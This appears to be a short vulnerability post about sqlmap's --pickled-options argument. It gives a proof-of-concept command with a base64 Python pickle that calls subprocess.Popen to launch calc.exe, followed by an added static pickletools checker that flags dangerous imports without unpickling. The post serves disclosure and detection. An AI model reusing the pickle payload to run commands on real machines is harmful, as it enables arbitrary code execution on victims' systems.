This vulnerability has been circulating widely on Weibo today.
The relevant PoC is given below:

sqlmap.py -u "http://www.ihonker.org/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg=="

Base64-decoded (a Python pickle; the line breaks between opcodes are not shown):

csubprocessPopenp1(S'calc.exe'p2tp3Rp4.
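
Added example, not part of the original post and not sqlmap code: a static check that disassembles a base64 pickled value with `pickletools.genops` and reports the names it would import and the opcodes that would call them, without ever unpickling it. The function name `inspect_pickled_value`, the `allowed` allowlist and the benign sample are assumptions made for illustration; the first sample is the value shown above.

```python
import base64
import binascii
import pickle
import pickletools

# Opcodes that import a name, and opcodes that call or build an object.
IMPORT_OPS = {"GLOBAL", "INST", "STACK_GLOBAL"}
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

# The base64 value from the command line shown on this page.
PAGE_VALUE = "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg=="
# Constructed benign sample: a plain dict pickled with protocol 0.
BENIGN_VALUE = base64.b64encode(
    pickle.dumps({"url": "http://example.test/?id=1"}, protocol=0)).decode()


def inspect_pickled_value(b64_value, allowed=frozenset()):
    """Disassemble a base64 pickle and report imports and call opcodes.

    The bytes are only walked with pickletools.genops and never handed
    to pickle.loads, so nothing inside the value is executed.
    `allowed` is a hypothetical allowlist of dotted names.
    """
    report = {"valid": True, "imports": [], "calls": [], "suspicious": True}
    try:
        raw = base64.b64decode(b64_value, validate=True)
        for opcode, arg, _pos in pickletools.genops(raw):
            if opcode.name in IMPORT_OPS:
                # GLOBAL/INST carry "module name"; STACK_GLOBAL has no arg.
                name = arg.replace(" ", ".") if arg else "<from stack>"
                report["imports"].append(name)
            if opcode.name in CALL_OPS:
                report["calls"].append(opcode.name)
    except (binascii.Error, ValueError):
        report["valid"] = False  # not base64 or not a well-formed pickle
        return report
    # Any import outside the allowlist means loading it can reach that callable.
    report["suspicious"] = any(n not in allowed for n in report["imports"])
    return report


if __name__ == "__main__":
    for label, value in (("page", PAGE_VALUE), ("benign", BENIGN_VALUE)):
        print(label, inspect_pickled_value(value))
```

A value that fails to decode or disassemble is reported as invalid and stays flagged, so a caller can reject it instead of loading it.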

Video:
http://video.weibo.com/player/1034:4cbd333b0bf3af1de46ea99660b9a8b5/v.swf